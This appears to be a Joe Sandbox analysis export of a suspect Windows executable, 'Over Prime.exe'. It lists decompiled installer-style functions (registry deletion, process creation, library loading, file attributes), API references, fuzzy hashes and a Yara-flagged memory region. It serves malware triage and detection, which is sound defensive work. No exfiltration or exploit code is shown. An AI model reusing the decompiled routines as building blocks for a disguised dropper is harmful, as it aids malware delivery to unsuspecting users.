Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00402434 Relevance: 3.0, APIs: 2, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402434(void* __ebx) {
				long _t7;
				void* _t14;
				long _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t23;

				_t14 = __ebx;
				_t26 =  *(_t23 - 0x20) - __ebx;
				_t20 =  *((intOrPtr*)(_t23 - 0x2c));
				if( *(_t23 - 0x20) != __ebx) {
					_t7 = E00402E64(_t20, E00402DA6(0x22),  *(_t23 - 0x20) >> 1); // executed
					_t18 = _t7;
					goto L4;
				} else {
					_t22 = E00402DE6(_t26, 2);
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueW(_t22, E00402DA6(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t14) {
							goto L6;
						}
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}

0x00402434
0x00402434
0x00402437
0x0040243a
0x00402476
0x0040247b
0x00000000
0x0040243c
0x00402443
0x00402447
0x0040292e
0x0040292e
0x0040244d
0x0040245d
0x0040245f
0x0040247d
0x0040247f
0x00000000
0x00402485
0x0040247f
0x00402447
0x00402c2d
0x00402c39

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
RegCloseKey.ADVAPI32(00000000), ref: 0040245F

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: b11cc944ee52a845f4ccc3aae7b8a08f084828b84caae6e38230c487fc66971e
Instruction ID: 30df5d2aec36195d54007c6df5f336708121daf1b93815cec1e8c6dbc8099d71
Opcode Fuzzy Hash: b11cc944ee52a845f4ccc3aae7b8a08f084828b84caae6e38230c487fc66971e
Instruction Fuzzy Hash: 22F0C232A00120EBDB11ABB89B4DAED72A8AF84314F15443BE141B71C0DAFC5D01866D

Uniqueness

Uniqueness Score: -1.00%

Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EFC
EnableWindow.USER32(00000000,00000000), ref: 00401F07

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: fa234a311d5315365d19d83b79d92e578c8214a2500263e11cb90b957d52e03b
Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
Opcode Fuzzy Hash: fa234a311d5315365d19d83b79d92e578c8214a2500263e11cb90b957d52e03b
Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D

Uniqueness

Uniqueness Score: -1.00%

Function 00405B20 Relevance: 3.0, APIs: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405B20(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x430270->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430270,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405b29
0x00405b49
0x00405b51
0x00405b56
0x00000000
0x00405b5c
0x00405b60

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000,00000000), ref: 00405B49
CloseHandle.KERNEL32(?), ref: 00405B56

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
Instruction ID: 0547baa0b497a95b6ed0e8f273b1969b1ac2c9598ef2001c301bcde660c6e2d6
Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
Instruction Fuzzy Hash: 3EE092B4600209BFEB10AB64AE49F7B7AACEB04704F004565BA51E61A1DB78E8158A78

Uniqueness

Uniqueness Score: -1.00%

Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401573(void* __ebx) {
				int _t4;
				void* _t9;
				struct HWND__* _t11;
				struct HWND__* _t12;
				void* _t16;

				_t9 = __ebx;
				_t11 =  *0x433ed0; // 0x603fa
				if(_t11 != __ebx) {
					ShowWindow(_t11,  *(_t16 - 0x2c)); // executed
					_t4 =  *(_t16 - 0x30);
				}
				_t12 =  *0x433ee4; // 0xb004e
				if(_t12 != _t9) {
					ShowWindow(_t12, _t4); // executed
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t16 - 4));
				return 0;
			}

0x00401573
0x00401573
0x00401581
0x00401587
0x00401589
0x00401589
0x0040158c
0x00401594
0x0040159c
0x0040159c
0x00402c2d
0x00402c39

APIs

ShowWindow.USER32(000603FA,?), ref: 00401587
ShowWindow.USER32(000B004E), ref: 0040159C

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 830d7a4ba9a8f24a7d9b261e52e8913face7f91c13cb0f59137def6ec9c3a180
Instruction ID: a156d7c756385a3c588793d51facb92f34767ed8181f20582b2048d309791e4b
Opcode Fuzzy Hash: 830d7a4ba9a8f24a7d9b261e52e8913face7f91c13cb0f59137def6ec9c3a180
Instruction Fuzzy Hash: 25E04F76B101149BCB05DFA8ED908AEB3A6EB84311314483BE502B3290D675AD048B18

Uniqueness

Uniqueness Score: -1.00%

Function 0040690A Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040690A(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E0040689A(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406912
0x00406915
0x0040691c
0x00406924
0x00406930
0x00000000
0x00406937
0x00406927
0x0040692e
0x00000000
0x0040693f
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
GetProcAddress.KERNEL32(00000000,?), ref: 00406937

Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E

Uniqueness

Uniqueness Score: -1.00%

Function 0040602D Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040602D(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00406031
0x0040603e
0x00406053
0x00406059

APIs

GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Over Prime.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00406008 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406008(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x0040600d
0x00406013
0x00406018
0x00406021
0x00406021
0x0040602a

APIs

GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405AEB Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AEB(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405af1
0x00405af9
0x00000000
0x00405aff
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
GetLastError.KERNEL32 ref: 00405AFF

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D

Uniqueness

Uniqueness Score: -1.00%

Function 02C42FC6 Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35931da7f7d91c89f5179219889272d8a67d1057a585839d9d4b975bc1ca38f8
Instruction ID: ca1dd778ad2d0c0f6f575757f94da78c609408b57caf57ff182f2ea223047774
Opcode Fuzzy Hash: 35931da7f7d91c89f5179219889272d8a67d1057a585839d9d4b975bc1ca38f8
Instruction Fuzzy Hash: 22514874A003459FDB359F28C9957EF37A3EF95360FA0816EED4A8B201DB314A85CB01

Uniqueness

Uniqueness Score: -1.00%

Function 02C3B678 Relevance: 1.6, APIs: 1, Instructions: 137libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000000,?,02C4760D,?), ref: 02C435FB

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 61a180551d5412620b0d24f3c7935307a9b2f5a543624680d3886e4a7c455966
Instruction ID: 56431f335fb37613a4371de20bcd5dee1ae2cc9f74c98d7bac76a4a12d8aa26c
Opcode Fuzzy Hash: 61a180551d5412620b0d24f3c7935307a9b2f5a543624680d3886e4a7c455966
Instruction Fuzzy Hash: 5B413A796043869ADF329D7889447EF3B639FD2370FB0C26DDC095B115DB714A42D611

Uniqueness

Uniqueness Score: -1.00%

Function 02C43485 Relevance: 1.6, APIs: 1, Instructions: 126libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000000,?,02C4760D,?), ref: 02C435FB

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 13e7108357acc234c91e8d43b0c1968dd948cd2f8dd3fc3f561113360c593da6
Instruction ID: 04102296930e334a09bc22bab08f350e628e019f105df880f0563d4a310bf544
Opcode Fuzzy Hash: 13e7108357acc234c91e8d43b0c1968dd948cd2f8dd3fc3f561113360c593da6
Instruction Fuzzy Hash: 61319DB56047448FDB368E258DD43EF2B63AFC63B0F60C26ADC498B284DB708A46D701

Uniqueness

Uniqueness Score: -1.00%

Function 02C385F7 Relevance: 1.6, APIs: 1, Instructions: 121libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000000,?,02C4760D,?), ref: 02C435FB

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 952c90397c857575819aa70238809922d3f2f2cdf68e37acdf30d70a497628a1
Instruction ID: a92d2cfd835b98d519eee27849ba600200bc06991671e7132ddddecf36e2a77a
Opcode Fuzzy Hash: 952c90397c857575819aa70238809922d3f2f2cdf68e37acdf30d70a497628a1
Instruction Fuzzy Hash: 8C4136B8A047458FCF34AE6999547EF3B73AFC5360FA18129DC899B205CB314A43DB16

Uniqueness

Uniqueness Score: -1.00%

Function 00402891 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00402891(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t16;
				void* _t19;

				_t15 = __edx;
				_pop(ds);
				if(__eflags != 0) {
					_t8 = E00402D84(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x10)) = _t15;
					_t10 = SetFilePointer(E0040649D(_t14, _t16), _t8, _t12,  *(_t19 - 0x24)); // executed
					if( *((intOrPtr*)(_t19 - 0x2c)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E00406484();
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402891
0x00402891
0x00402892
0x0040289a
0x0040289f
0x004028a0
0x004028af
0x004028b8
0x004028be
0x00402ba1
0x00402ba4
0x00402ba4
0x004028b8
0x00402c2d
0x00402c39

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028AF

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
Instruction ID: a13d1cf18dcce6f7d85bed0b4e0fde0de6b16079219dfacd376ffc086bc6f252
Opcode Fuzzy Hash: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
Instruction Fuzzy Hash: D3E09271A04105BFDB01EFA5AE499AEB3B8EF44319B10483BF102F00C1DA794D119B2D

Uniqueness

Uniqueness Score: -1.00%

Function 004023B2 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004023B2(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402DA6(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
					_t13 = E00402DA6(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
					_t11 = E00402DA6(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x004023b2
0x004023b2
0x004023b4
0x004023b8
0x004023bb
0x004023c0
0x004023c5
0x004023ce
0x004023ce
0x004023d3
0x004023dc
0x004023dc
0x004023e9
0x004015b4
0x004015b6
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
